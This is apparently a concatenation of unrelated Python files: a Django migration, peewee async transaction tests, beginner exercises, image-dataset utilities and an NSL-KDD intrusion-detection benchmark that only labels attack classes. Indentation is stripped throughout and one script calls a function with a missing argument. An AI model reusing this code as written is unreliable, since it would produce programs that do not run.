assert version == "v1.0" or version == "v1.1"
if version == "v1.0":
return squeezenet_v10(num_classes)
else:
return squeezenet_v11(num_classes)
|
from PyQt5 import QtWidgets
from Graphics import Ui_MainWindow
from ConnectionPackage.ConnectionModule import ConnectionModule
from SignalGenerationPackage.SignalGenerationModule import SignalGenerationModule
from FrequencySettingPackage.FrequencySettingModule import FrequencySettingModule
from LogVisualizationPackage.LogVisualizationModule import LogVisualizationModule
class ApplicationManager:
def __init__(self):
self.ApplicationModules = \
[
ConnectionModule(),
FrequencySettingModule(),
SignalGenerationModule(),
LogVisualizationModule()
]
self.MainWindow = QtWidgets.QMainWindow()
self.UserInterface = Ui_MainWindow()
self.UserInterface.setupUi(self.MainWindow)
self.RunAllModules()
def RunAllModules(self):
for module in self.ApplicationModules:
module.Run(self.UserInterface)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2018-05-08 10:39
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('garmin', '0024_auto_20180329_0916'),
]
operations = [
migrations.CreateModel(
name='GarminPingNotification',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('upload_start_time_seconds', models.IntegerField(blank=True, null=True)),
('summary_type', models.CharField(choices=[('dailies', 'Dailies'), ('activities', 'Activities'), ('manuallyUpdatedActivities', 'Manually Updated Activities'), ('epochs', 'Epochs'), ('sleeps', 'Sleeps'), ('bodyComps', 'Body Composition'), ('stressDetails', 'Stress Details'), ('moveIQActivities', 'Move IQ Activities'), ('userMetrics', 'User Metrics'), ('deregistration', 'Deregistration')], max_length=100)),
('notification', models.TextField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddIndex(
model_name='garminpingnotification',
index=models.Index(fields=['user', 'upload_start_time_seconds'], name='garmin_garm_user_id_54c4a3_idx'),
),
migrations.AddIndex(
model_name='garminpingnotification',
index=models.Index(fields=['-created_at'], name='garmin_garm_created_352598_idx'),
),
migrations.AddIndex(
model_name='garminpingnotification',
index=models.Index(fields=['upload_start_time_seconds'], name='garmin_garm_upload__6a0297_idx'),
),
]
|
# import threading
# from peewee import _atomic
# from peewee import SqliteDatabase
# from peewee import transaction
# from playhouse.tests.base import database_class
# from playhouse.tests.base import mock
# from playhouse.tests.base import ModelTestCase
# from playhouse.tests.base import skip_if
# from playhouse.tests.base import test_db
# from playhouse.tests.models import *
import sys
import pytest
from functools import partial
from models import *
from peewee import CharField, IntegerField, SQL, fn, R, QueryCompiler, ForeignKeyField
from aiopeewee import AioModel as Model
from aiopeewee import AioMySQLDatabase
from models import db, User, Blog, UniqueModel
pytestmark = pytest.mark.asyncio
# class TestTransaction(ModelTestCase):
# requires = [User, Blog]
# def tearDown(self):
# super(TestTransaction, self).tearDown()
# test_db.set_autocommit(True)
# def test_transaction_connection_handling(self):
# patch = 'peewee.Database'
# db = SqliteDatabase(':memory:')
# with mock.patch(patch, wraps=db) as patched_db:
# with transaction(patched_db):
# patched_db.begin.assert_called_once_with()
# self.assertEqual(patched_db.commit.call_count, 0)
# self.assertEqual(patched_db.rollback.call_count, 0)
# patched_db.begin.assert_called_once_with()
# patched_db.commit.assert_called_once_with()
# self.assertEqual(patched_db.rollback.call_count, 0)
# with mock.patch(patch, wraps=db) as patched_db:
# def _test_patched():
# patched_db.commit.side_effect = ValueError
# with transaction(patched_db):
# pass
# self.assertRaises(ValueError, _test_patched)
# patched_db.begin.assert_called_once_with()
# patched_db.commit.assert_called_once_with()
# patched_db.rollback.assert_called_once_with()
# def test_atomic_nesting(self):
# db = SqliteDatabase(':memory:')
# db_patches = mock.patch.multiple(
# db,
# begin=mock.DEFAULT,
# commit=mock.DEFAULT,
# execute_sql=mock.DEFAULT,
# rollback=mock.DEFAULT)
# with mock.patch('peewee.Database', wraps=db) as patched_db:
# with db_patches as db_mocks:
# begin = db_mocks['begin']
# commit = db_mocks['commit']
# execute_sql = db_mocks['execute_sql']
# rollback = db_mocks['rollback']
# with _atomic(patched_db):
# patched_db.transaction.assert_called_once_with(None)
# begin.assert_called_once_with(lock_type=None)
# self.assertEqual(patched_db.savepoint.call_count, 0)
# with _atomic(patched_db):
# patched_db.transaction.assert_called_once_with(None)
# begin.assert_called_once_with(lock_type=None)
# patched_db.savepoint.assert_called_once_with()
# self.assertEqual(commit.call_count, 0)
# self.assertEqual(rollback.call_count, 0)
# with _atomic(patched_db):
# (patched_db.transaction
# .assert_called_once_with(None))
# begin.assert_called_once_with(lock_type=None)
# self.assertEqual(
# patched_db.savepoint.call_count,
# 2)
# begin.assert_called_once_with(lock_type=None)
# self.assertEqual(commit.call_count, 0)
# self.assertEqual(rollback.call_count, 0)
# commit.assert_called_once_with()
# self.assertEqual(rollback.call_count, 0)
# def test_savepoint_explicit_commits(self):
# with test_db.atomic() as txn:
# User.create(username='txn-rollback')
# txn.rollback()
# User.create(username='txn-commit')
# txn.commit()
# with test_db.atomic() as sp:
# User.create(username='sp-rollback')
# sp.rollback()
# User.create(username='sp-commit')
# sp.commit()
# usernames = [u.username for u in User.select().order_by(User.username)]
# self.assertEqual(usernames, ['sp-commit', 'txn-commit'])
# def test_autocommit(self):
# test_db.set_autocommit(False)
# test_db.begin()
# u1 = User.create(username='u1')
# u2 = User.create(username='u2')
# # open up a new connection to the database, it won't register any blogs
# # as being created
# new_db = self.new_connection()
# res = new_db.execute_sql('select count(*) from users;')
# self.assertEqual(res.fetchone()[0], 0)
# # commit our blog inserts
# test_db.commit()
# # now the blogs are query-able from another connection
# res = new_db.execute_sql('select count(*) from users;')
# self.assertEqual(res.fetchone()[0], 2)
# def test_transactions(self):
# def transaction_generator():
# with test_db.transaction():
# User.create(username='u1')
# yield
# User.create(username='u2')
# gen = transaction_generator()
# next(gen)
# conn2 = self.new_connection()
# res = conn2.execute_sql('select count(*) from users;').fetchone()
# self.assertEqual(res[0], 0)
# self.assertEqual(User.select().count(), 1)
# # Consume the rest of the generator.
# for _ in gen:
# pass
# self.assertEqual(User.select().count(), 2)
# res = conn2.execute_sql('select count(*) from users;').fetchone()
# self.assertEqual(res[0], 2)
# def test_manual_commit_rollback(self):
# def assertUsers(expected):
# query = User.select(User.username).order_by(User.username)
# self.assertEqual(
# [username for username, in query.tuples()],
# expected)
# with test_db.transaction() as txn:
# User.create(username='charlie')
# txn.commit()
# User.create(username='huey')
# txn.rollback()
# assertUsers(['charlie'])
# with test_db.transaction() as txn:
# User.create(username='huey')
# txn.rollback()
# User.create(username='zaizee')
# assertUsers(['charlie', 'zaizee'])
# def test_transaction_decorator(self):
# @test_db.transaction()
# def create_user(username):
# User.create(username=username)
# create_user('charlie')
# self.assertEqual(User.select().count(), 1)
# def test_commit_on_success(self):
# self.assertTrue(test_db.get_autocommit())
# @test_db.commit_on_success
# def will_fail():
# User.create(username='u1')
# Blog.create() # no blog, will raise an error
# self.assertRaises(IntegrityError, will_fail)
# self.assertEqual(User.select().count(), 0)
# self.assertEqual(Blog.select().count(), 0)
# @test_db.commit_on_success
# def will_succeed():
# u = User.create(username='u1')
# Blog.create(title='b1', user=u)
# will_succeed()
# self.assertEqual(User.select().count(), 1)
# self.assertEqual(Blog.select().count(), 1)
# async def test_context_mgr(flushdb):
# async def do_will_fail():
# #TODO it was db.transaction()
# async with db.atomic():
# await User.create(username='u1')
# await Blog.create() # no blog, will raise an error
# with pytest.raises(IntegrityError):
# await do_will_fail()
# assert await Blog.select().count() == 0
# async def do_will_succeed():
# #TODO it was db.atomic()
# async with db.atomic():
# u = await User.create(username='u1')
# await Blog.create(title='b1', user=u)
# await do_will_succeed()
# assert await User.select().count() == 1
# assert await Blog.select().count() == 1
# async def do_manual_rollback():
# #TODO it was db.atomic()
# async with db.atomic() as txn:
# await User.create(username='u2')
# await txn.rollback()
# await do_manual_rollback()
# assert await User.select().count() == 1
# assert await Blog.select().count() == 1
# def test_nesting_transactions(self):
# @test_db.commit_on_success
# def outer(should_fail=False):
# self.assertEqual(test_db.transaction_depth(), 1)
# User.create(username='outer')
# inner(should_fail)
# self.assertEqual(test_db.transaction_depth(), 1)
# @test_db.commit_on_success
# def inner(should_fail):
# self.assertEqual(test_db.transaction_depth(), 2)
# User.create(username='inner')
# if should_fail:
# raise ValueError('failing')
# self.assertRaises(ValueError, outer, should_fail=True)
# self.assertEqual(User.select().count(), 0)
# self.assertEqual(test_db.transaction_depth(), 0)
# outer(should_fail=False)
# self.assertEqual(User.select().count(), 2)
# self.assertEqual(test_db.transaction_depth(), 0)
# class TestExecutionContext(ModelTestCase):
# requires = [User]
# def test_context_simple(self):
# with test_db.execution_context():
# User.create(username='charlie')
# self.assertEqual(test_db.execution_context_depth(), 1)
# self.assertEqual(test_db.execution_context_depth(), 0)
# with test_db.execution_context():
# self.assertTrue(
# User.select().where(User.username == 'charlie').exists())
# self.assertEqual(test_db.execution_context_depth(), 1)
# self.assertEqual(test_db.execution_context_depth(), 0)
# queries = self.queries()
# def test_context_ext(self):
# with test_db.execution_context():
# with test_db.execution_context() as inner_ctx:
# with test_db.execution_context():
# User.create(username='huey')
# self.assertEqual(test_db.execution_context_depth(), 3)
# conn = test_db.get_conn()
# self.assertEqual(conn, inner_ctx.connection)
# self.assertTrue(
# User.select().where(User.username == 'huey').exists())
# self.assertEqual(test_db.execution_context_depth(), 0)
# def test_context_multithreaded(self):
# conn = test_db.get_conn()
# evt = threading.Event()
# evt2 = threading.Event()
# def create():
# with test_db.execution_context() as ctx:
# database = ctx.database
# self.assertEqual(database.execution_context_depth(), 1)
# evt2.set()
# evt.wait()
# self.assertNotEqual(conn, ctx.connection)
# User.create(username='huey')
# create_t = threading.Thread(target=create)
# create_t.daemon = True
# create_t.start()
# evt2.wait()
# self.assertEqual(test_db.execution_context_depth(), 0)
# evt.set()
# create_t.join()
# self.assertEqual(test_db.execution_context_depth(), 0)
# self.assertEqual(User.select().count(), 1)
# def test_context_concurrency(self):
# def create(i):
# with test_db.execution_context():
# with test_db.execution_context() as ctx:
# User.create(username='u%s' % i)
# self.assertEqual(ctx.database.execution_context_depth(), 2)
# threads = [threading.Thread(target=create, args=(i,))
# for i in range(5)]
# for thread in threads:
# thread.start()
# [thread.join() for thread in threads]
# self.assertEqual(
# [user.username for user in User.select().order_by(User.username)],
# ['u0', 'u1', 'u2', 'u3', 'u4'])
# def test_context_conn_error(self):
# class MagicException(Exception):
# pass
# class FailDB(SqliteDatabase):
# def _connect(self, *args, **kwargs):
# raise MagicException('boo')
# db = FailDB(':memory:')
# def generate_exc():
# try:
# with db.execution_context():
# db.execute_sql('SELECT 1;')
# except MagicException:
# db.get_conn()
# self.assertRaises(MagicException, generate_exc)
# class TestAutoRollback(ModelTestCase):
# requires = [User, Blog]
# def setUp(self):
# test_db.autorollback = True
# super(TestAutoRollback, self).setUp()
# def tearDown(self):
# test_db.autorollback = False
# test_db.set_autocommit(True)
# super(TestAutoRollback, self).tearDown()
# def test_auto_rollback(self):
# # Exceptions are still raised.
# self.assertRaises(IntegrityError, Blog.create)
# # The transaction should have been automatically rolled-back, allowing
# # us to create new objects (in a new transaction).
# u = User.create(username='u')
# self.assertTrue(u.id)
# # No-op, the previous INSERT was already committed.
# test_db.rollback()
# # Ensure we can get our user back.
# u_db = User.get(User.username == 'u')
# self.assertEqual(u.id, u_db.id)
# def test_transaction_ctx_mgr(self):
# 'Only auto-rollback when autocommit is enabled.'
# def create_error():
# self.assertRaises(IntegrityError, Blog.create)
# # autocommit is disabled in a transaction ctx manager.
# with test_db.transaction():
# # Error occurs, but exception is caught, leaving the current txn
# # in a bad state.
# create_error()
# try:
# create_error()
# except Exception as exc:
# # Subsequent call will raise an InternalError with postgres.
# self.assertTrue(isinstance(exc, InternalError))
# else:
# self.assertFalse(
# issubclass(database_class, PostgresqlDatabase))
# # New transactions are not affected.
# self.test_auto_rollback()
# def test_manual(self):
# test_db.set_autocommit(False)
# # Will not be rolled back.
# self.assertRaises(IntegrityError, Blog.create)
# if issubclass(database_class, PostgresqlDatabase):
# self.assertRaises(InternalError, User.create, username='u')
# test_db.rollback()
# u = User.create(username='u')
# test_db.commit()
# u_db = User.get(User.username == 'u')
# self.assertEqual(u.id, u_db.id)
# class TestSavepoints(ModelTestCase):
# requires = [User]
# def _outer(self, fail_outer=False, fail_inner=False):
# with test_db.savepoint():
# User.create(username='outer')
# try:
# self._inner(fail_inner)
# except ValueError:
# pass
# if fail_outer:
# raise ValueError
# def _inner(self, fail_inner):
# with test_db.savepoint():
# User.create(username='inner')
# if fail_inner:
# raise ValueError('failing')
# def assertNames(self, expected):
# query = User.select().order_by(User.username)
# self.assertEqual([u.username for u in query], expected)
# def test_success(self):
# with test_db.transaction():
# self._outer()
# self.assertEqual(User.select().count(), 2)
# self.assertNames(['inner', 'outer'])
# def test_inner_failure(self):
# with test_db.transaction():
# self._outer(fail_inner=True)
# self.assertEqual(User.select().count(), 1)
# self.assertNames(['outer'])
# def test_outer_failure(self):
# # Because the outer savepoint is rolled back, we'll lose the
# # inner savepoint as well.
# with test_db.transaction():
# self.assertRaises(ValueError, self._outer, fail_outer=True)
# self.assertEqual(User.select().count(), 0)
# def test_failure(self):
# with test_db.transaction():
# self.assertRaises(
# ValueError, self._outer, fail_outer=True, fail_inner=True)
# self.assertEqual(User.select().count(), 0)
# class TestAtomic(ModelTestCase):
# requires = [User, UniqueModel]
# TODO: must be explicit with the nested transactions
# async def test_atomic(flushdb):
# async with db.atomic():
# await User.create(username='u1')
# async with db.atomic():
# await User.create(username='u2')
# async with db.atomic() as txn3:
# await User.create(username='u3')
# await txn3.rollback()
# async with db.atomic():
# await User.create(username='u4')
# async with db.atomic() as txn5:
# await User.create(username='u5')
# await txn5.rollback()
# await User.create(username='u6')
# query = await User.select().order_by(User.username)
# assert [u.username for u in query] == ['u1', 'u2', 'u4', 'u6']
# def test_atomic_second_connection(self):
# def test_separate_conn(expected):
# new_db = self.new_connection()
# cursor = new_db.execute_sql('select username from users;')
# usernames = sorted(row[0] for row in cursor.fetchall())
# self.assertEqual(usernames, expected)
# new_db.close()
# with test_db.atomic():
# User.create(username='u1')
# test_separate_conn([])
# with test_db.atomic():
# User.create(username='u2')
# with test_db.atomic() as tx3:
# User.create(username='u3')
# tx3.rollback()
# test_separate_conn([])
# users = User.select(User.username).order_by(User.username)
# self.assertEqual(
# [user.username for user in users],
# ['u1', 'u2'])
# users = User.select(User.username).order_by(User.username)
# self.assertEqual(
# [user.username for user in users],
# ['u1', 'u2'])
# def test_atomic_decorator(self):
# @test_db.atomic()
# def create_user(username):
# User.create(username=username)
# create_user('charlie')
# self.assertEqual(User.select().count(), 1)
# def test_atomic_decorator_nesting(self):
# @test_db.atomic()
# def create_unique(name):
# UniqueModel.create(name=name)
# @test_db.atomic()
# def create_both(username):
# User.create(username=username)
# try:
# create_unique(username)
# except IntegrityError:
# pass
# create_unique('huey')
# self.assertEqual(UniqueModel.select().count(), 1)
# create_both('charlie')
# self.assertEqual(User.select().count(), 1)
# self.assertEqual(UniqueModel.select().count(), 2)
# create_both('huey')
# self.assertEqual(User.select().count(), 2)
# self.assertEqual(UniqueModel.select().count(), 2)
# async def test_atomic_rollback(flushdb):
# async with db.atomic() as txn:
# await UniqueModel.create(name='charlie')
# try:
# async with txn.atomic():
# await UniqueModel.create(name='charlie')
# except IntegrityError:
# pass
# else:
# assert False
# async with txn.atomic() as txn1:
# await UniqueModel.create(name='zaizee')
# try:
# async with txn1.atomic():
# await UniqueModel.create(name='zaizee')
# except IntegrityError:
# pass
# else:
# assert False
# await UniqueModel.create(name='mickey')
# await UniqueModel.create(name='huey')
# names = [um.name async for um in
# UniqueModel.select().order_by(UniqueModel.name)]
# assert names == ['charlie', 'huey', 'mickey', 'zaizee']
async def test_atomic_with_delete(flushdb):
for i in range(3):
await User.create(username=f'u{i}')
async with db.atomic():
user = await User.get(User.username == 'u1')
await user.delete_instance()
usernames = [u.username async for u in User.select()]
assert sorted(usernames) == ['u0', 'u2']
async with db.atomic():
async with db.atomic():
user = await User.get(User.username == 'u2')
await user.delete_instance()
usernames = [u.username async for u in User.select()]
assert usernames == ['u0']
|
def paul(arr):
scores = {'kata': 5, 'Petes kata': 10, 'eating': 1}
result = sum(scores.get(a, 0) for a in arr)
if result < 40:
return 'Super happy!'
elif result < 70:
return 'Happy!'
elif result < 100:
return 'Sad!'
return 'Miserable!'
|
from __future__ import print_function #输出格式兼容
import os
from PIL import Image
path = 'D:/Downloads/Cache/Desktop/Baselines/DualGAN-master/test/50000/cityscapes/leftImg8bit/frankfurt/'
names = os.listdir(path)
for name in names:
img =Image.open(path+name)
print(img.format, img.size, img.mode) |
#Taking input from users
print "How old are you?",
age=raw_input()
print "How tall are you?",
height=raw_input()
print "How much do you weigh?",
weight=raw_input()
print "So you're %r years old, %r feet in height and %r kgs heavy." %(age,height,weight) |
import csv
from default_clf import DefaultNSL
from itertools import chain
from time import process_time
import numpy as np
import pandas as pd
NUM_PASSES = 100
NUM_ACC_PASSES = 50
TRAIN_PATH = 'data/KDDTrain+.csv'
TEST_PATH = 'data/KDDTest+.csv'
ATTACKS = {
'normal': 'normal',
'back': 'DoS',
'land': 'DoS',
'neptune': 'DoS',
'pod': 'DoS',
'smurf': 'DoS',
'teardrop': 'DoS',
'mailbomb': 'DoS',
'apache2': 'DoS',
'processtable': 'DoS',
'udpstorm': 'DoS',
'ipsweep': 'Probe',
'nmap': 'Probe',
'portsweep': 'Probe',
'satan': 'Probe',
'mscan': 'Probe',
'saint': 'Probe',
'ftp_write': 'R2L',
'guess_passwd': 'R2L',
'imap': 'R2L',
'multihop': 'R2L',
'phf': 'R2L',
'spy': 'R2L',
'warezclient': 'R2L',
'warezmaster': 'R2L',
'sendmail': 'R2L',
'named': 'R2L',
'snmpgetattack': 'R2L',
'snmpguess': 'R2L',
'xlock': 'R2L',
'xsnoop': 'R2L',
'worm': 'R2L',
'buffer_overflow': 'U2R',
'loadmodule': 'U2R',
'perl': 'U2R',
'rootkit': 'U2R',
'httptunnel': 'U2R',
'ps': 'U2R',
'sqlattack': 'U2R',
'xterm': 'U2R'
}
def get_current_charge():
try:
with open('/sys/class/power_supply/BAT0/charge_now') as f:
return int(f.readline())
except IOError:
print("Cannot find current battery charge.")
return 0
def check_load_training(clf, path):
start = process_time()
clf.load_training_data(path)
end = process_time()
return end - start
def check_load_testing(clf, path):
start = process_time()
clf.load_test_data(path)
end = process_time()
return end - start
def check_training(clf):
start = process_time()
clf.train_clf()
end = process_time()
return end - start
def check_testing_entire_dataset(clf, train=False):
start = process_time()
clf.test_clf(train)
end = process_time()
return end - start
def check_predict_row(clf, row):
start = process_time()
clf.predict(row)
end = process_time()
return end - start
def get_stats(arr, function, *args, **kwargs):
charge_start = get_current_charge()
for i in range(NUM_PASSES):
arr[i] = function(*args, **kwargs)
charge_end = get_current_charge()
mean = arr.mean()
std = arr.std()
return [mean, std, (charge_start - charge_end)]
def evaluate_power(clf):
res = np.empty(shape=(NUM_PASSES, 1))
load_train = get_stats(res, check_load_training, clf, TRAIN_PATH)
print('Loading Training: ', load_train)
load_test = get_stats(res, check_load_testing, clf, TEST_PATH)
print('Loading Testing: ', load_test)
train = get_stats(res, check_training, clf)
print('Training: ', train)
test_dataset = get_stats(res, check_testing_entire_dataset, clf)
print('Testing dataset: ', test_dataset)
row = clf.testing[0].iloc[0].values.reshape(1, -1)
test_row = get_stats(res, check_predict_row, clf, row)
print('Testing one row: ', test_row)
with open('results.csv', 'a', newline='') as csvf:
csv_writer = csv.writer(csvf)
csv_writer.writerow([clf.__class__.__name__, 'Number of Passes:', NUM_PASSES, 'Power'])
csv_writer.writerow(['Function', 'Time (s) Mean', 'Time Std',
'Total Power (microwatt-hour)'])
csv_writer.writerow(['Loading Training Data'] + load_train)
csv_writer.writerow(['Loading Testing Data'] + load_test)
csv_writer.writerow(['Training Classifier'] + train)
csv_writer.writerow(['Testing Dataset'] + test_dataset)
csv_writer.writerow(['Testing One Row'] + test_row)
def evaluate_accuracy(clf):
acc = np.empty(shape=(NUM_ACC_PASSES, 1))
clf.load_training_data(TRAIN_PATH)
clf.load_test_data(TEST_PATH)
cat_labels = clf.testing[1].apply(lambda x: ATTACKS[x])
cats = {'U2R':[np.zeros(shape=(NUM_ACC_PASSES, 1)), np.zeros(shape=(NUM_ACC_PASSES, 1))],
'DoS':[np.zeros(shape=(NUM_ACC_PASSES, 1)), np.zeros(shape=(NUM_ACC_PASSES, 1))],
'R2L':[np.zeros(shape=(NUM_ACC_PASSES, 1)), np.zeros(shape=(NUM_ACC_PASSES, 1))],
'Probe':[np.zeros(shape=(NUM_ACC_PASSES, 1)), np.zeros(shape=(NUM_ACC_PASSES, 1))],
'normal':[np.zeros(shape=(NUM_ACC_PASSES, 1)), np.zeros(shape=(NUM_ACC_PASSES, 1))]}
for i in range(0, NUM_ACC_PASSES):
clf.train_clf()
preds, acc[i] = clf.test_clf()
for cat, pred in zip(cat_labels, preds):
cats[cat][pred == 'normal'][i] += 1
clf.shuffle_training_data()
conf = calculate_category_accuracy(cats)
mean = acc.mean()
std = acc.std()
write_acc_to_csv([mean, std], cats, conf, clf.__class__.__name__)
return [mean, std]
def calculate_category_accuracy(cats):
conf = {'TN':np.zeros(shape=(NUM_ACC_PASSES, 1)), 'TP':np.zeros(shape=(NUM_ACC_PASSES, 1)),
'FN':np.zeros(shape=(NUM_ACC_PASSES, 1)), 'FP':np.zeros(shape=(NUM_ACC_PASSES, 1))}
for key, values in cats.items():
correct = values[0]
wrong = values[1]
if key == 'normal':
correct, wrong = wrong, correct
conf['TN'] += correct
conf['FP'] += wrong
else:
conf['TP'] += correct
conf['FN'] += wrong
avg = correct/(correct+wrong)
cats[key] = [avg.mean(), avg.std()]
return conf
def write_acc_to_csv(acc, cats, conf, name):
with open('results.csv', 'a', newline='') as csvf:
csv_writer = csv.writer(csvf)
csv_writer.writerow([name, 'Number of Passes:', NUM_ACC_PASSES, 'Accuracy'])
csv_writer.writerow(['Statistic', 'Mean', 'STD'])
csv_writer.writerow(['Accuracy'] + acc)
for key, values in cats.items():
csv_writer.writerow([key] + values)
for key, values in conf.items():
csv_writer.writerow([key, values.mean(), values.std()])
|
# Use the file name mbox-short.txt as the file name
fname = input("Enter file name: ")
fh = open(fname)
average = 0.0
N = 0 # Total number
for line in fh:
if not line.startswith("X-DSPAM-Confidence:") : continue
stripped_line = float(line[20:27])
average = average + stripped_line
N += 1
average = average/N
print('Average spam confidence:', average)
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv('https://s3.amazonaws.com/content.udacity-data.com/courses/ud359/titanic_data.csv')
total_males = 0
total_females = 0
survivor_males = 0
survivor_females = 0
for passenger_index, passenger in df.iterrows():
passenger_id = passenger['PassengerId']
passenger_survived = passenger['Survived']
passenger_sex = passenger['Sex']
if passenger_sex == 'male':
total_males += 1
if passenger_survived == 1:
survivor_males += 1
if passenger_sex == 'female':
total_females += 1
if passenger_survived == 1:
survivor_females += 1
plt.bar(['male','female'], [total_males, total_females])
plt.show()
plt.bar(['male','female'], [survivor_males, survivor_females])
plt.show()
|
from __future__ import division
import math
class Vector(object):
def __init__(self, x, y):
self.x=x
self.y=y
def magnitude(self):
return math.sqrt(self.x**2+self.y**2)
def normalize(self):
newx=self.x/self.magnitude()
newy=self.y/self.magnitude()
return Vector(newx, newy)
def direction(self):
return math.atan(self.y/self.x)
def __add__(self, other):
return Vector(self.x+other.x, self.y+other.y)
def __sub__(self, other):
return Vector(self.x-other.x, self.y-other.y)
def __mul__(self, other):
return Vector(self.x*other, self.y*other)
def __div__(self, other):
return Vector(self.x/other, self.y/other)
def __str__(self):
return "<"+str(self.x)+","+str(self.y)+">"
def __cmp__(self, other):
return cmp(self.magnitude(), other.magnitude())
def dot(vector1, vector2):
return vector1.x*vector2.x+vector1.y*vector2.y
def angle(vector1, vector2):
norm1=vector1.normalize()
norm2=vector2.normalize()
return math.acos(dot(norm1, norm2))
|
import cv2
import os
import numpy as np
import random
import shutil
from tqdm import tqdm
def get_filelist(path, ext=[]):
file_list = []
files = os.listdir(path)
for f in files:
if f.split('.')[-1] in ext:
file_list.append(f)
return file_list
def load_img(path, grayscale=False):
if grayscale:
img = cv2.imread(path,cv2.IMREAD_GRAYSCALE)
else:
img = cv2.imread(path)
img = np.array(img,dtype="float") / 255.0
return img
def load_label(path):
return cv2.imread(path,cv2.IMREAD_GRAYSCALE)
def get_random_data(annotation, random=True, grayscale = False):
'''random preprocessing for real-time data augmentation'''
images = load_img(train_path + 'src/' + annotation, grayscale = grayscale)
mask = load_label(train_path + 'label/' + annotation)
if not random:
return np.array(images), mask
img_h, img_w, _ = images.shape
def rotate(xb, yb, angle):
M_rotate = cv2.getRotationMatrix2D((img_w / 2, img_h / 2), angle, 1)
xb = cv2.warpAffine(xb, M_rotate, (img_w, img_h))
yb = cv2.warpAffine(yb, M_rotate, (img_w, img_h))
return xb, yb
def random_augment(xb, yb):
xb = xb.astype(np.uint8)
r = np.random.random()
if r < 0.25:
xb, yb = rotate(xb, yb, 90)
elif (r >= 0.25) and (r < 0.5):
xb, yb = rotate(xb, yb, 180)
elif (r >= 0.5) and (r < 0.75):
xb, yb = rotate(xb, yb, 270)
# else: 啥也不干
r = np.random.random()
if r < 0.25:
# Flipped Horizontally 水平翻转
xb = cv2.flip(xb, 1)
yb = cv2.flip(yb, 1)
elif (r >= 0.25) and (r < 0.5):
# Flipped Vertically 垂直翻转
xb = cv2.flip(xb, 0)
yb = cv2.flip(yb, 0)
elif (r >= 0.5) and (r < 0.75):
# Flipped Horizontally & Vertically 水平垂直翻转
xb = cv2.flip(xb, -1)
yb = cv2.flip(yb, -1)
return xb, yb
images, mask = random_augment(images, mask)
return np.array(images), mask
def split_img_and_mask(image, label, split_size, split_dir):
count = 0
split_img_path = os.path.join(split_dir, 'image')
if not os.path.exists(split_img_path):
os.makedirs(split_img_path)
print('makedir: ', split_img_path)
split_label_path = os.path.join(split_dir, 'label')
if not os.path.exists(split_label_path):
os.makedirs(split_label_path)
print('makedir: ', split_label_path)
src_label = label
src_img = image
src_h,src_w,src_c = src_img.shape
for i in range(int(src_w/split_size)):
w = i*split_size
for j in range(int(src_h/split_size)):
h = j*split_size
src_out = src_img[h:h+split_size,w:w+split_size]
label_out = src_label[h:h+split_size,w:w+split_size]
#检查子图的空白占比
flag = (src_out == 0)
flag = np.all(flag, axis=-1)
flag = flag.astype(np.int)
if np.sum(flag) < (split_size*split_size*0.4):
cv2.imwrite(os.path.join(split_img_path, 'img_' + str(w) + '_' + str(h) + '.png'), src_out)
cv2.imwrite(os.path.join(split_label_path, 'img_' + str(w) + '_' + str(h) + '.png'), label_out)
print('{:4d} write: {}'.format(count+1, 'img_' + str(w) + '_' + str(h) + '.png'))
count += 1
print('done!')
def apportion(src_dir, apport_dir, apport_rate, seed):
#建立目录
train_src_path = os.path.join(apport_dir, 'train','image')
train_label_path = os.path.join(apport_dir, 'train','label')
valid_src_path = os.path.join(apport_dir, 'valid','image')
valid_label_path = os.path.join(apport_dir, 'valid','label')
if not os.path.exists(train_src_path):
os.makedirs(train_src_path)
if not os.path.exists(train_label_path):
os.makedirs(train_label_path)
if not os.path.exists(valid_src_path):
os.makedirs(valid_src_path)
if not os.path.exists(valid_label_path):
os.makedirs(valid_label_path)
src_path = os.path.join(src_dir, 'image')
label_path = os.path.join(src_dir, 'label')
all_imgs = get_filelist(src_path,['png'])
train_corn = 0
train_baccy = 0
valid_corn = 0
valid_baccy = 0
train_list = []
valid_list = []
total_num = len(all_imgs)
train_num = total_num*apport_rate['train']
valid_num = total_num*apport_rate['valid']
print('train:%d | valid:%d '%(train_num,valid_num))
random.seed(seed)
random.shuffle(all_imgs)
for i in range(total_num):
if i <train_num:
train_list.append(all_imgs[i])
elif (i >= train_num) and (i < total_num):
valid_list.append(all_imgs[i])
for f in train_list:
mask = cv2.imread(label_path+'/'+f, -1)
if np.any(mask==1):
train_corn += 1
if np.any(mask==2):
train_baccy += 1
shutil.copy(src_path+'/'+f, train_src_path)
shutil.copy(label_path+'/'+f, train_label_path)
for f in valid_list:
mask = cv2.imread(label_path+'/'+f, -1)
if np.any(mask==1):
valid_corn += 1
if np.any(mask==2):
valid_baccy += 1
shutil.copy(src_path+'/'+f, valid_src_path)
shutil.copy(label_path+'/'+f, valid_label_path)
if (train_num > 0):
print('train_corn: {:.2f}%, train_baccy: {:.2f}%'.format(train_corn / train_num*100, train_baccy / train_num*100))
if (valid_num > 0):
print('valid_corn: {:.2f}%, valid_baccy: {:.2f}%'.format(valid_corn / valid_num*100, valid_baccy / valid_num*100))
print('done!')
if __name__ == '__main__':
src_dir = './dataset/split_512/'
apport_dir = './dataset/split_512/apport/'
# train/valid 分配比例
apport_rate = {'train':0.70,'valid':0.30}
apportion(src_dir, apport_dir, apport_rate) |
'''
Owner: Luis Eduardo Hernandez Ayala
Email: luis.hdez97@hotmail.com
Python Version: 3.7.x, but shouldn't have problems with 2.7.x
'''
from math import sqrt, cos, sin
from FussyNetwork import GaussyModel
import numpy as np
import random
try:
import matplotlib.pyplot as plt
import matplotlib.path as mpath
import matplotlib.patches as mpatches
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
plt_found = True
except:
plt_found = False
logger = open('logs.log', 'w')
RESOLUTION_MEDIAN = 0
RESOLUTION_DESV_STD = 1
RESOLUTION_P = 2
RESOLUTION_Q = 3
RESOLUTION_R = 4
MEDIAN_START = 0
MEDIAN_END = 6
DESV_STD_START = 6
